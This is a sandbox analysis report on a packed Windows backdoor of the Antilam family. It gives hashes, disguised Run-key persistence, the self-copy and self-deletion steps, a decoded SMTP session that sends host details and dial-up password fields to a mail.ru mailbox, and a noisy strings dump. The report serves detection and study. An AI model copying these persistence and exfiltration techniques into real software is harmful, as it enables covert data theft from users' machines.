Analysis Date: 2013-12-06 08:16:33
MD5: f87cd3255b9c3814cf88c1fad8878275
SHA1: 4dbfabbb359c71ba625cb41c83616117135d142e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (raw size 0 — these are the digests of empty input; the UPX0 section carries no data on disk)
Section UPX1 md5: 4e11bc65d752282fd01a1dcd7d1d0238 sha1: af6b15c46b595e2b928d3d900b4b5381bffabfc8 size: 178176
Section .rsrc md5: fcc3a6ddaee41da57e770bb2555f8a11 sha1: 5259cb6c6e545caa6bea2f35419ab698bb685b00 size: 3584
Timestamp: 1992-06-19 22:22:17 (the fixed default value written by the Borland/Delphi linker, consistent with the Delphi runtime strings further down; it is not the real build time and should not be used for timeline analysis)
Packer: UPX -> www.upx.sourceforge.net
PEhash: 912c228f688f9dc717f64dd6e9eb1dcd0c78ff64
AV (McAfee): BackDoor-AJW
AV (AVG): BackDoor.Generic12.BWJP
AV (ClamAV): Trojan.Antilam.20b
AV (Avira): BDS/Antilam.20.C
AV (MSSE): Backdoor:Win32/Antilam.2_0
Note: all five engines classify the sample as a backdoor; ClamAV, Avira and Microsoft agree on the Antilam 2.0 family name.

Runtime Details:


Process
↳ C:\malware.exe

Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
(Persistence: the same autorun value is written under both the HKCU and HKLM Run keys, under a value name that imitates a Windows utility; the trailing \x00 is the string terminator captured by the monitor.)
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\KeyConfig\Con ➝
1\\x00
Creates File C:\WINDOWS\MicrosoftOqerExpress.exe
Creates Process C:\WINDOWS\MicrosoftOqerExpress.exe
(The dropper copies itself into C:\WINDOWS under a name resembling a Microsoft product and starts the copy; see the second process below.)

Process
↳ C:\WINDOWS\MicrosoftOqerExpress.exe

Registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\DirectX\Start ➝
ok\\x00
(A marker value unrelated to DirectX; its exact purpose cannot be determined from this report — presumably an installed/started flag.)
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS Scandisk ➝
C:\WINDOWS\MicrosoftOqerExpress.exe\\x00
(The dropped copy re-asserts both Run-key entries on start.)
Creates File C:\WINDOWS\SCAN.DLL
Creates File PIPE\lsarpc
(Opens the LSA RPC named pipe.)
Creates File \Device\Afd\AsyncSelectHlp
Creates File \Device\Afd\Endpoint
(AFD is the Winsock kernel driver; these handles correspond to socket creation for the SMTP connection in the Network section.)
Deletes File C:\malware.exe
(The running copy removes the original dropper, so the file under C:\WINDOWS is the only on-disk artifact left.)

Network Details:

DNS smtp.mail.ru
Type: A
94.100.177.1
Flows TCP 192.168.1.1:1032 ➝ 94.100.177.1:25
Note: the sample exfiltrates its collected data by speaking plaintext SMTP directly to a public mail server on TCP/25; no AUTH or STARTTLS appears in the capture below. Outbound TCP/25 from a workstation to a non-corporate mail host is a usable detection signal, as are the DNS lookup of smtp.mail.ru and the recipient address in the payload.

Raw Pcap (decoded: HELO MAIL.RU / MAIL FROM: Pass@mail.ru / RCPT TO: uldashevradmir@mail.ru, then a DATA body with no headers that reports "IP Address: 192.168.16.1 [139]", "CompName: COMPUTER-XXXXXX", an empty "DialUp пароли:" (dial-up passwords) field, an empty "ICQ:" field, the local date/time, and a Windows-1251 Cyrillic footer reading "Заходите на http://hack-info.ru и пишите мне на ogprog@ukr.net" — "Visit http://hack-info.ru and write to me at ogprog@ukr.net". Note that the IP in the body differs from the flow's source address, 192.168.1.1.)
0x00000000 (00000)   48454c4f 204d4149 4c2e5255 0d0a4d41   HELO MAIL.RU..MA
0x00000010 (00016)   494c2046 524f4d3a 20506173 73406d61   IL FROM: Pass@ma
0x00000020 (00032)   696c2e72 750d0a52 43505420 544f3a20   il.ru..RCPT TO: 
0x00000030 (00048)   3c756c64 61736865 76726164 6d697240   <uldashevradmir@
0x00000040 (00064)   6d61696c 2e72753e 0d0a4441 54410d0a   mail.ru>..DATA..
0x00000050 (00080)   49502041 64647265 73733a20 3139322e   IP Address: 192.
0x00000060 (00096)   3136382e 31362e31 205b3133 395d0d0a   168.16.1 [139]..
0x00000070 (00112)   0d0a436f 6d704e61 6d653a20 434f4d50   ..CompName: COMP
0x00000080 (00128)   55544552 2d585858 5858580d 0a0d0a44   UTER-XXXXXX....D
0x00000090 (00144)   69616c55 7020efe0 f0eeebe8 3a0d0a0d   ialUp ......:...
0x000000a0 (00160)   0a494351 3a200d0a 0d0a0d0a 20202020   .ICQ: ......    
0x000000b0 (00176)   31322f36 2f323031 33202d20 373a3234   12/6/2013 - 7:24
0x000000c0 (00192)   3a343820 414d0d0a 0d0ac7e0 f5eee4e8   :48 AM..........
0x000000d0 (00208)   f2e520ed e0206874 74703a2f 2f686163   .. .. http://hac
0x000000e0 (00224)   6b2d696e 666f2e72 7520e820 efe8f8e8   k-info.ru . ....
0x000000f0 (00240)   f2e520ec ede520ed e0206f67 70726f67   .. ... .. ogprog
0x00000100 (00256)   40756b72 2e6e6574 0d0a2e0d 0a515549   @ukr.net.....QUI
0x00000110 (00272)   540d0a                                T..


Strings (the file is UPX-packed, so most entries below are compressed-data noise; plaintext that survives in the stub and resources includes the dropped filename MicrosoftOqerExpress.exe, the Run-key value name MS Scandisk, smtp.mail.ru and the two e-mail addresses from the pcap, rasapi32.dll / RasHangUpA and edialer.ini, and Delphi runtime markers such as DVCLAL, PACKAGEINFO and "This program must be run under Win32")
DVCLAL
EXEFILE
MAINICON
PACKAGEINFO
SCAN
TFRMSERVER
TNMSHOW
~ << .
0()(2)
0<6{WDz3
08TE+B%@
#099BCryptIV
@0?CD1
0dW8[+/ ~[
0	fpDefa
"	0`ho<d1
0;oP" 
0p_lod@
#&<0rX
0_VSHWIN32.EXEO
?1Flat
1%sHPd
1u[4aM
1V2sjU
@``2!'
&2B7Tu
2@D|pBy c
-2Dzzo
* ())@-2wg
2 W$G32
}%3C0j
=_3DDk
3EThreadArray
3` )!Hl
3)ia(<'
!3m 9S
3_MAINICON
3%ZvG$$u
(451BK
4-cR50
4?Ct)?S`A
4decgh
4(j,dd
4?\*.k
4K$VnH
4M[\]^ab4M
4MDEFHIO4M
4MDLT\dl4M
4Mnopqrt4M
4PQRTU
4S_AX/-
4suvwx4ME
51<Et:<et6
57tkzu/1
%5B>&W0jD<
5IIHh\
5M$7rasapi
5(OYPF@
5/v]+@
5Virtu$
~5$y49
68EiOT
6CK x	k
&6F_(n
6JO!Ba
76@`pq
77vaw)
<7C(Bb
7gSilver
7 /`LO \E:
7$!!OL~B
7@r{VH
7v7j8t=
;8B]8B_
8H\pL2
	[<*8L
8(o:Db
8#o-PT
@8p-0)
.\8p*o"
8=\RlR@
8Z7"?,U
\:`#9 
95/98 W[i
95; I)
(`9A8:S
9bU	LhAY(&&
9(ctxx
/9$#G.(
"'9mp9
a#1Btp
a1hM#tn.jh"
a1>zpD
A6AI2l
\,aAhgr
A@@/Am
(AbD<x
A-`$bW
advapi32.dll
,a"#FFiY
aj#	!"
Ajhmw2i
akoP_8
Al<c	Lf
AM/PM8A
A:NcpW
and\Delphi\RTLEPUMaskValue
=APMS?
)^A;XT
-(=ayM
ay/x-sw
B&9B00
B>Ct4V
BF^4@44
/B^%h[
:BNMBJ
Boolean
b.?\Run
ByWl'Wor.?
bZ?	_loM ,$
;C0t:?@
c^0tkA#h{=)
C21X(g
C2w;;tis{
C5Xs[0@
`c8iPt\[
]C9MC.GP
C/a&>-
CD-ROM
	{!c#E
_C~(F$r
$Cjr3(
CNE#BI
cOi/zeF
comctl32.dll
CONks,VV
Cou(Lp
CPT TO3<w>W
cpyW,Y`
C*q`Nr!
)C{t\_
cutnX7
+cvLoh
Cz`j&+
\^D:2p
%d8/;;
D@<8L2
].D9(`
d@A/>]u
daudS 
Dd,Lx\
D?E&B%
Device
dFH6\6^
DiskFreeSp08
/DISPLAY<
		dJ>B$l@	
d+~ji2
d[k; th
`DlluP'
?dOUF#
d 'S$Td
=DuVpF
E0es!5J
E-?{#9
EASTROPE
E.cjES
ECK(zT
EClass
ed78)`K
\edialer.ini
EDivBy
EeS60A
eftTop
 ehRaH.
/	E\hv
 EMFtZ
EOutOfMe
e"RCFW
ESOfoRtluw
et8\pk
e:,"<w
	Excep
ExitProcess
e#Ygu4/
}f_ - 
F8;\b}
FaGID>
/FDiag
F.f=<G
ffsiOu
F"<)HK
File DATA.CAB not found
<F/ioe
FlFm"zm
FO3BH@5
FO-l@ 
FontPitc
FqOZTUWVS
\F_-Rf;a 	X
)Fromx
fS;v^/
{F@u"kcb
fxtt.Gp
@fy.x+[[
:,g2&'y
"G4@c#
gdi32.dll
GetLongPathNameAAqNq&O
GetProcAddress
\?^GF1&
:GH0~I
g^Ha']
%(G@ihI
!=+!GM
gppW-k
G%s_%d
gSYMBOLcO
G@ t;h
"gWZ^yW
gZ; |SMw
H2_0Q!/
H33!zl
H6{!~X*
^hA"Ax
H[A~Qz
HARSETDEFAULT5
<H>'$bA
[ hb.h
H~DTLm`&
HEDITD
H#Gla0
, ;Hh|"
hhN?p`
HIFTJIS
HI\;J(u
?,hin 
HJ%NHJ
`&HNg08\$nvlu
Hotkey
+hQ8`Zr 'H
+Hs!h$
Ht =|]
 HTTP/1
HU?oXtZ
h/Vd"H
Hy?D&,m
h$=Y v
[{HZn^w
i48<@D
i4a`)O
i"5Qssw
iamapp&%
"i-C@	0Z
ICA3HfAc
ich~"$
iC>Km?
IdAEkl
i/DR2-W7
Ignor!
IhO84|2w.
}i&isQ/
ijklmM
iLQI0dH
ImageList_Add
?|imCl
Integer
IO} a/v
I[O]Bn
ions Copyright (c) 1983,99 
"IP]H$
%+Iphh
is-)&6
IsEqualGUID
IUnknown
IzAfH]&GUf
J12345H8&
((j1g;
! j$i&
_;;JIc#$
 jjh9Sp> }4
j$Link
jLISTBOX
)Jltp?Fg
J,m5-%m
jP}1NY
><J>P$O
jPSX2m
,JT>@./ x
JvRvD!b0
Jw0y\HZ]
 K1'^6
K%-69VD}H
K;A<|$
@~KAVI
KERNEL32.DLL
'kkk7~
@KL`Eu
K++Lok
k/oZt 
:K(%&R
)/KRIN
:KU$z7
Ky0cB 
Kz`Kc:\a
?((L33M((
>l4,40
 Layouts\'xo
l <BBO	
l!Cl?W
`LdmManu$!
lG%.8y
L~m@cLong\
LoadLibraryA
LookupDHHqlb5	!
Lpv4Z2
l,tG 2;a
,>`L%`W]
L?X+v(
lZRequ
@:$<;M
M0N|*y}&
^m0z;~
Magel	
m=ALB &
Map {j
MaxLengt	F
MBlock
mDhpm^
Menuo)	6
MicrosoftOqerExpress.exe
MjK[[{
^mm!}5
}?Module
Mozsla/4
mp)'l	
mPRmdV
MS Scandisk
 MSWHEEL
_MUST_DIEA7
MV1/HPmPp
My[/XOR
NAVAP!m
nel32.dll
n FhGv>f
N(;F,t
n)l;`6
nmA`x0
NMsmtp
nross&$
nt; Ws
N\vI#T
?<O2t(
O37,Y$I
?'&=O8
O9GHIJKLMNO-
oANSI_Ci
oAscii
ocket<
OEnumAplayD
o&fC?&q
	Oh|'B5``B
Oi G&!T)
o"[jgv
oK.ECOMR,WWEB
ole32.dll
oleaut32.dll
<ole L
OLJMGu
Om|"Gk
OpenPrinterA
oRadio
OSB&U+-
oSH(p8
&ouseZ
;oVBw5
o]W4x'
owg<o//
OwnerM
OWrDxJ
*-&*$P
P2,482
;P<^2r
Pb)6d`
PBq ci
p<C,	l(
P/H9q'
P;\"Hn
Ph[# ,o%5s
PhTvhX
PixUsP
PoQ;mBE
PQPObKQ
!$">PR
Primary
+PTmY(
PurpleGTeal
P$V:0eC
!PWL&B{
P!)x.8
pxkPrQ
q(4w+X
Q?5F)cei+
@\Q	DC
q[F_90
@<,q*-Fa
+qP7PH
+qq[:k_
q>qw;N
Q&Tj$-
|Q	+u@
=QuYyy
QW"AD\
qWl	$s
QwW9N{C
^*!R}`
\r$04$
$@r2 '
>(r^3,@
R7B&9f
rasapi32.dll
RasHangUpA
rB~DeletD
rDHLGM
Rebuil
	Redb	
RegCloseKey
r;E;X%
rH%yc[
RICHED
}Ri&u5"`
rk.tC:
R-~O~(
RrrPP3
RUSSIAN
|RW^\tz
s4 T=N`&
 S5v l
SafecalM
(-Sa`HO
(^.SCJ_LINES/ 
SCv	G6
shell32.dll
ShellExecuteA
SL`qO89
slvSX0
()+,SM
smtp.mail.ru
 $SNZGM=
SOFTWARE\Borl
$'sr&G~+
SS4$GV
StdCtrlsX
STf+h$s
STUVWXYZo
SU<HtH
sWpoK++
Sx,{C/
SXTfMUK
`\SYC0
Sync!_.
*t"	0r<)
#t&<0t%<.t,<,t3
`/t5:L
"t!-6Ks
T6rfaced
t#;A8tiO}
TAdYnc.Z
TAlignment
	TBiDil
TBkicAc
TClipbo
TCUomPrKm
T;C`u',U
(tFOk@
T`Gfuq\
t/gif,
{t%[h!
t<hgUQ
This program must be run under Win32
t{hq}x)P
	Thumb
timeSetEvent
-ti	+tf$
TLHm6n-0)
t.	+Md
tMp(b6
t`n	bQ\
TObject
tp://h
TPropFixup
TPUyVM
tqPJb[\l(
t:	ssRegul7
<'t$<"t *
TT'1aG
TT}4r#
TURKISHH
<tX]V+
T!y#4@
[$uAh#
UD9+d 3
u(]EB9DEa
uG	Fuchsia
-U*ii$
?UIN: Wr
@ukr.net
uldashevradmir@mail.ru
<&uOw6
upx.ts
u	'(qCK
-urlGs@fg
user32.dll
USERCDLL
us/SCkc
ustify
U]u.	Fu*SR
uUPR:,
`UUr$d@e`f
@^(uvX
 uwMtkE
v02FPsfA
v4?{3u
Varian
VariantClear
v!%Bgn
v [dt,
verflowp
_-vfA9?
Vhh:nn'|
V	H-]U
vJN/t@
vN~ ^,!
v@$n31
v!|pA/
V&:P<haFT><
vR(IGKu
vsstat'e
_VXYZM
vY]1a&2'
=v$yPm
_W0`#H
\%W12W
W3thfh
w`<#-7
^Wa^Xo6|
wd!llU
Web[r3
=?Win32t
winmm.dll
WINNLS
winspool.drv
 with 
W~J$#w@
WKeepoc
wKF^cPT
"Wm3!mL5
W>N^n&
WP8M"m
wp!@|H
WrAdminIF
wsock32.dll
W/*tEf
.W$_;tx
wVlw['
wwp.m-
wwwwww
wwwwwwww
WYt t R
x9/H9po
-Xa.lC
X cH&1
&%XDGHM
XEFILE
xi*QgA
xl.T\)Hs
.XMm& V0
:X.n	8
xoj%Bu
xpp^kZ
Xs(%;P5
^^~xtaXt\0u
x#<@|@Z
Y^4w$gt
#$y<	5
Y6tHD$
yB*dM!jh
-ycY.4m"
/Y@Eh`$
YEhis 
Yellow
Y!g[T#
Y_H!G)>
YiW(5	
+Y`J{F
y=Llr+?+NETG 0 ? &to=&@,
*ym,]o
+y;O|c
Y#~|%Ow0
Yq eN 
YskPP74
Y$T0Ao
ytpPoz
Yt.+yt
yWE'Up
Z!	?!-
+Z7riticalSe
z+B@GL
ZE~	rcFk
zevSlguel
*}[ZH(E
,z=h#l@
$zInvalidOp
/)zn}>
$&-Z-n
z(O:P/
&Z@W_O4
	'<%ZX/
ZxgnEW
,ZXZYI